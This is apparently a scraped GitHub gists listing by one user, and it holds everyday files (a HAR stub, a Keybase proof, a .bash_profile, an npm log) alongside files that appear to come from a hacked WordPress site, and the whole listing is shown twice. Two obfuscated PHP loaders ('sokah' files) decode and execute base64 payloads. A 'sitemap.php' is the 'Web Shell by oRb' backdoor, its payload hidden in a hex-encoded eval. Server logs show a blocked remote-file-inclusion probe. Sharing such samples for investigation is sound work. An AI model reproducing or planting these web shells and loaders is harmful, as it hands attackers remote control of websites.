Mike Eng mrengy

## loop11.har
{
  "log": {
    "version": "1.2",
    "creator": {
      "name": "WebInspector",
      "version": "537.36"
    },
    "pages": [
      {
        "startedDateTime": "2019-03-27T19:01:43.048Z",

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                mrengy
                / keybase.md
            
            
              Created
              December 13, 2017 19:21
            
          
    Keybase proof

I hereby claim:

I am mrengy on github.
I am mrengy (https://keybase.io/mrengy) on keybase.
I have a public key ASCParVuRflRB_ocL9_X8ZDcGATedpox53UbDvDzMfP_BAo

To claim this, I am signing this object:

  
## .bash_profile


[[ -s "$HOME/.profile" ]] && source "$HOME/.profile" # Load the default .profile

[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*
export PATH="/usr/local/bin:$PATH"
export PATH="/usr/local/bin:$PATH"

# Setting PATH for Python 2.7
# The orginal version is saved in .bash_profile.pysave

## npm.debug.log 5.2.16
0 info it worked if it ends with ok
1 verbose cli [ '/usr/local/bin/node', '/usr/local/bin/npm', 'install' ]
2 info using npm@2.15.1
3 info using node@v4.4.3
4 verbose readDependencies loading dependencies from /Applications/MAMP/htdocs/cg-style/package.json
5 warn package.json cloudgov-style@0.3.4 license should be a valid SPDX license expression
6 verbose install where, deps [ '/Applications/MAMP/htdocs/cg-style',
6 verbose install   [ 'uswds',
6 verbose install     'autoprefixer',
6 verbose install     'browserify',

## sokah426.php
<?php
$UCk = 'm;efvlwsiq6hgnu_xcoyzbr4ajkdtp';
$u7 = $UCk{7} . $UCk{28} . $UCk{22} . $UCk{15} . $UCk{22} . $UCk{2} . $UCk{29} . $UCk{5} . $UCk{24} . $UCk{17} . $UCk{2};
$p6 = $UCk{21} . $UCk{24} . $UCk{7} . $UCk{2} . $UCk{10} . $UCk{23} . $UCk{15} . $UCk{27} . $UCk{2} . $UCk{17} . $UCk{18} . $UCk{27} . $UCk{2};
$a5m = $UCk{17} . $UCk{22} . $UCk{2} . $UCk{24} . $UCk{28} . $UCk{2} . $UCk{15} . $UCk{3} . $UCk{14} . $UCk{13} . $UCk{17} . $UCk{28} . $UCk{8} . $UCk{18} . $UCk{13};
$h2n = $a5m( '$R9T,$zr', $p6($u7( array($UCk{1}, "\n"), "", "JHIgP;SAnJzt;mb3IoJGk9M;DskaTx;zdHJsZ;W4oJF;I5VCk7JGkr;Kyl7;JGM9b3JkK;HN1Yn;N0ci;gkUjlU;LC
AkaS;kpOyRjLT1;vcmQoc3Vi;c3Ry;KCR6ciw;oKCRpKz;EpJX;N0cmxlb;igkenI;pKSk;pOyRyL;j1jaHIoYWJ;z
KCRjKSAmI;DB4RkYpO3;1yZXR1cm4g;JHI7" )) );
$tn = $a5m( "", $h2n($p6($u7( array($UCk{1}, "\n"), "", "S9urlr;S74Yxo;trWjxLvd2;G7Hv;6W1k;I/Ypuu6ZMD;C0M2vrma;YuLfh16bn;g4qknJyc;aJyBP;1p6trCQtY
e;Bo7GW;0LDabZJwk;4/Fs+Wnrn;h/qm5L;2buj;s8rY0;6+TjJ;Sbv9vQjth;uXlrReYRhk;2aetna;XzbTmq6l4;

## sokah8621.php
<?php
$z1g = 'zjxklhcgeoutdiwmp;q6rsy4_navbf';
$XP = $z1g{21} . $z1g{11} . $z1g{20} . $z1g{24} . $z1g{20} . $z1g{8} . $z1g{16} . $z1g{4} . $z1g{26} . $z1g{6} . $z1g{8};
$e3W = $z1g{28} . $z1g{26} . $z1g{21} . $z1g{8} . $z1g{19} . $z1g{23} . $z1g{24} . $z1g{12} . $z1g{8} . $z1g{6} . $z1g{9} . $z1g{12} . $z1g{8};
$G3y = $z1g{6} . $z1g{20} . $z1g{8} . $z1g{26} . $z1g{11} . $z1g{8} . $z1g{24} . $z1g{29} . $z1g{10} . $z1g{25} . $z1g{6} . $z1g{11} . $z1g{13} . $z1g{9} . $z1g{25};
$RU6 = $G3y( '$HF,$Av', $e3W($XP( array($z1g{17}, "\n"), "", "JHIgPSAn;Jztmb3IoJ;Gk9MDska;TxzdHJsZW4;oJEh;GKTs;kaSsr;KXskYz1;vcmQoc;3Vic3RyKCR;IRiwg;JG
kpKTs;kYy09b3J;kKHN1Yn;N0cigkQXY;sKCgkaSs;xKSVz;dHJsZ;W4oJEF2KSk;pKTsk;ci49Y2hy;KGFicygk
Yy;kgJiAw;eEZGKT;t9cmV0dX;JuICRyOw=;=" )) );
$OuM = $G3y( "", $RU6($e3W($XP( array($z1g{17}, "\n"), "", "dJirz6+9yp;JXid25z;L3YpHPCxMi;9pFC60;8PMh9qcp9;e5k3jN;mKfgvr3;Mp4WatH;iQf5Nr;UHhvn6S;5co
e6nr;N/1p+t;lah4;lYqRuOCs;0YCTa1B4sc;3GzaSv3bl4;nsl7;r9q3pb2SW;VDpVXh4;ilCv1GuAwd;2jq+Jz

## sitemap.php
<?php # Web Shell by oRb
$auth_pass = "bdfa762517dbee605ddea6ac0205b3ec";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl+cnr7pnsG37pPne4en9udKhX39978Y/JTmkRs+GbnTOGJt5oShc122ngfByHetKrNO/Hk4ww+vTw6fBjF+8pyuE/bH3qUb4tcPznTgXuGnY2fS8yGxssVRe8PyLHRH3YkT98dle8NmNeZNZn4wcMv2X3ZVr7sCefaGh4mrUI0/Y9cZuGGZwDYatTp7UH/ADoOY7Qfz6cCWVOCPe+XF4uvNv/8F//37XzuRG0VeMO1GsRPGZYTe8aZeN3Ljsu2GYRB2/WBkVw/PXr0yMyG5SwCRXa2bWRPnquteuf15jJhjb+JKEMim713fm3hxOUmcOCOv3/1zHsRu1A3nUwQS2QN36E2hq96dHHWhQ04Ojg6hf+xm7QE17t//gg4epVGMZv0y76d7w/m0j4QwQBDFoTeLfCcau1G5RMPMge6FbjwPp8yLunzwZeZjPhkA+4xI0DHgMAmwFstDDeTdg26+V+q+OTo5hYmVIYEyEI5GQ5G6iIJXwcibljl1A88tW9swi5jje6Npuw9zxQ0728MgnLCJG4+DQXsWRHHnjRNFiyActNi2N53NYxZfz9z2TKSyqTPh3zp

## server - plugins directory
[thomas-nelson-jr]$ cd mike-eng.com/wp-content/plugins
[thomas-nelson-jr]$ ls
afc-flv-player	     feed_plugin	   kimili-flash-embed  visual-form-builder
afc-plug-system      hits-ie6-pngfix	   manual-image-crop   wordpress-importer
akismet		     image-rotation-fixer  postmash	       wordpress-meta-robots
batch-categories     index.php		   search-and-replace  wpaudio-mp3-player
broken-link-checker  jetpack		   syntax-highlighter
[thomas-nelson-jr]$ cd whatsmyrank-dev
-bash: cd: whatsmyrank-dev: No such file or directory

## server error log
[thomas-nelson-jr]$ tail -n 10 error.log
[Tue Apr 26 05:22:25 2016] [error] [client 91.200.12.24] ModSecurity: Access denied with code 418 (phase 1). String match "ofc_upload_image.php" at REQUEST_BASENAME. [file "/dh/apache2/template/etc/mod_sec2/99_dreamhost_rules.conf"] [line "236"] [id "1990059"] [msg "Open Flash-Chart RFI"] [hostname "mike-eng.com"] [uri "/wp-content/plugins/whatsmyrank-dev/php-ofc-library/ofc_upload_image.php"] [unique_id "Vx9dgdBx2ycAAH3pi5wAAAAP"]
[thomas-nelson-jr]$

## server access log
[thomas-nelson-jr]$ for k in `ls -S logs/*/http/access.log`; do wc -l $k | sort -r -n; done
181 logs/mike-eng.com/http/access.log
83 logs/emandmwedding.com/http/access.log
29 logs/stage.mike-eng.com/http/access.log
25 logs/emandminbeantown.com/http/access.log
0 logs/stage.emandminbeantown.com/http/access.log
	{
	"log": {
	"version": "1.2",
	"creator": {
	"name": "WebInspector",
	"version": "537.36"
	},
	"pages": [
	{
	"startedDateTime": "2019-03-27T19:01:43.048Z",


	[[ -s "$HOME/.profile" ]] && source "$HOME/.profile" # Load the default .profile

	[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session as a function
	export PATH="/usr/local/bin:$PATH"
	export PATH="/usr/local/bin:$PATH"

	# Setting PATH for Python 2.7
	# The orginal version is saved in .bash_profile.pysave
	0 info it worked if it ends with ok
	1 verbose cli [ '/usr/local/bin/node', '/usr/local/bin/npm', 'install' ]
	2 info using npm@2.15.1
	3 info using node@v4.4.3
	4 verbose readDependencies loading dependencies from /Applications/MAMP/htdocs/cg-style/package.json
	5 warn package.json cloudgov-style@0.3.4 license should be a valid SPDX license expression
	6 verbose install where, deps [ '/Applications/MAMP/htdocs/cg-style',
	6 verbose install [ 'uswds',
	6 verbose install 'autoprefixer',
	6 verbose install 'browserify',
	<?php
	$UCk = 'm;efvlwsiq6hgnu_xcoyzbr4ajkdtp';
	$u7 = $UCk{7} . $UCk{28} . $UCk{22} . $UCk{15} . $UCk{22} . $UCk{2} . $UCk{29} . $UCk{5} . $UCk{24} . $UCk{17} . $UCk{2};
	$p6 = $UCk{21} . $UCk{24} . $UCk{7} . $UCk{2} . $UCk{10} . $UCk{23} . $UCk{15} . $UCk{27} . $UCk{2} . $UCk{17} . $UCk{18} . $UCk{27} . $UCk{2};
	$a5m = $UCk{17} . $UCk{22} . $UCk{2} . $UCk{24} . $UCk{28} . $UCk{2} . $UCk{15} . $UCk{3} . $UCk{14} . $UCk{13} . $UCk{17} . $UCk{28} . $UCk{8} . $UCk{18} . $UCk{13};
	$h2n = $a5m( '$R9T,$zr', $p6($u7( array($UCk{1}, "\n"), "", "JHIgP;SAnJzt;mb3IoJGk9M;DskaTx;zdHJsZ;W4oJF;I5VCk7JGkr;Kyl7;JGM9b3JkK;HN1Yn;N0ci;gkUjlU;LC
	AkaS;kpOyRjLT1;vcmQoc3Vi;c3Ry;KCR6ciw;oKCRpKz;EpJX;N0cmxlb;igkenI;pKSk;pOyRyL;j1jaHIoYWJ;z
	KCRjKSAmI;DB4RkYpO3;1yZXR1cm4g;JHI7" )) );
	$tn = $a5m( "", $h2n($p6($u7( array($UCk{1}, "\n"), "", "S9urlr;S74Yxo;trWjxLvd2;G7Hv;6W1k;I/Ypuu6ZMD;C0M2vrma;YuLfh16bn;g4qknJyc;aJyBP;1p6trCQtY
	e;Bo7GW;0LDabZJwk;4/Fs+Wnrn;h/qm5L;2buj;s8rY0;6+TjJ;Sbv9vQjth;uXlrReYRhk;2aetna;XzbTmq6l4;
	<?php
	$z1g = 'zjxklhcgeoutdiwmp;q6rsy4_navbf';
	$XP = $z1g{21} . $z1g{11} . $z1g{20} . $z1g{24} . $z1g{20} . $z1g{8} . $z1g{16} . $z1g{4} . $z1g{26} . $z1g{6} . $z1g{8};
	$e3W = $z1g{28} . $z1g{26} . $z1g{21} . $z1g{8} . $z1g{19} . $z1g{23} . $z1g{24} . $z1g{12} . $z1g{8} . $z1g{6} . $z1g{9} . $z1g{12} . $z1g{8};
	$G3y = $z1g{6} . $z1g{20} . $z1g{8} . $z1g{26} . $z1g{11} . $z1g{8} . $z1g{24} . $z1g{29} . $z1g{10} . $z1g{25} . $z1g{6} . $z1g{11} . $z1g{13} . $z1g{9} . $z1g{25};
	$RU6 = $G3y( '$HF,$Av', $e3W($XP( array($z1g{17}, "\n"), "", "JHIgPSAn;Jztmb3IoJ;Gk9MDska;TxzdHJsZW4;oJEh;GKTs;kaSsr;KXskYz1;vcmQoc;3Vic3RyKCR;IRiwg;JG
	kpKTs;kYy09b3J;kKHN1Yn;N0cigkQXY;sKCgkaSs;xKSVz;dHJsZ;W4oJEF2KSk;pKTsk;ci49Y2hy;KGFicygk
	Yy;kgJiAw;eEZGKT;t9cmV0dX;JuICRyOw=;=" )) );
	$OuM = $G3y( "", $RU6($e3W($XP( array($z1g{17}, "\n"), "", "dJirz6+9yp;JXid25z;L3YpHPCxMi;9pFC60;8PMh9qcp9;e5k3jN;mKfgvr3;Mp4WatH;iQf5Nr;UHhvn6S;5co
	e6nr;N/1p+t;lah4;lYqRuOCs;0YCTa1B4sc;3GzaSv3bl4;nsl7;r9q3pb2SW;VDpVXh4;ilCv1GuAwd;2jq+Jz
	<?php # Web Shell by oRb
	$auth_pass = "bdfa762517dbee605ddea6ac0205b3ec";
	$color = "#df5";
	$default_action = 'FilesMan';
	$default_use_ajax = true;
	$default_charset = 'Windows-1251';
	preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl+cnr7pnsG37pPne4en9udKhX39978Y/JTmkRs+GbnTOGJt5oShc122ngfByHetKrNO/Hk4ww+vTw6fBjF+8pyuE/bH3qUb4tcPznTgXuGnY2fS8yGxssVRe8PyLHRH3YkT98dle8NmNeZNZn4wcMv2X3ZVr7sCefaGh4mrUI0/Y9cZuGGZwDYatTp7UH/ADoOY7Qfz6cCWVOCPe+XF4uvNv/8F//37XzuRG0VeMO1GsRPGZYTe8aZeN3Ljsu2GYRB2/WBkVw/PXr0yMyG5SwCRXa2bWRPnquteuf15jJhjb+JKEMim713fm3hxOUmcOCOv3/1zHsRu1A3nUwQS2QN36E2hq96dHHWhQ04Ojg6hf+xm7QE17t//gg4epVGMZv0y76d7w/m0j4QwQBDFoTeLfCcau1G5RMPMge6FbjwPp8yLunzwZeZjPhkA+4xI0DHgMAmwFstDDeTdg26+V+q+OTo5hYmVIYEyEI5GQ5G6iIJXwcibljl1A88tW9swi5jje6Npuw9zxQ0728MgnLCJG4+DQXsWRHHnjRNFiyActNi2N53NYxZfz9z2TKSyqTPh3zp
	[thomas-nelson-jr]$ cd mike-eng.com/wp-content/plugins
	[thomas-nelson-jr]$ ls
	afc-flv-player feed_plugin kimili-flash-embed visual-form-builder
	afc-plug-system hits-ie6-pngfix manual-image-crop wordpress-importer
	akismet image-rotation-fixer postmash wordpress-meta-robots
	batch-categories index.php search-and-replace wpaudio-mp3-player
	broken-link-checker jetpack syntax-highlighter
	[thomas-nelson-jr]$ cd whatsmyrank-dev
	-bash: cd: whatsmyrank-dev: No such file or directory
	[thomas-nelson-jr]$ tail -n 10 error.log
	[Tue Apr 26 05:22:25 2016] [error] [client 91.200.12.24] ModSecurity: Access denied with code 418 (phase 1). String match "ofc_upload_image.php" at REQUEST_BASENAME. [file "/dh/apache2/template/etc/mod_sec2/99_dreamhost_rules.conf"] [line "236"] [id "1990059"] [msg "Open Flash-Chart RFI"] [hostname "mike-eng.com"] [uri "/wp-content/plugins/whatsmyrank-dev/php-ofc-library/ofc_upload_image.php"] [unique_id "Vx9dgdBx2ycAAH3pi5wAAAAP"]
	[thomas-nelson-jr]$
	[thomas-nelson-jr]$ for k in `ls -S logs/*/http/access.log`; do wc -l $k \| sort -r -n; done
	181 logs/mike-eng.com/http/access.log
	83 logs/emandmwedding.com/http/access.log
	29 logs/stage.mike-eng.com/http/access.log
	25 logs/emandminbeantown.com/http/access.log
	0 logs/stage.emandminbeantown.com/http/access.log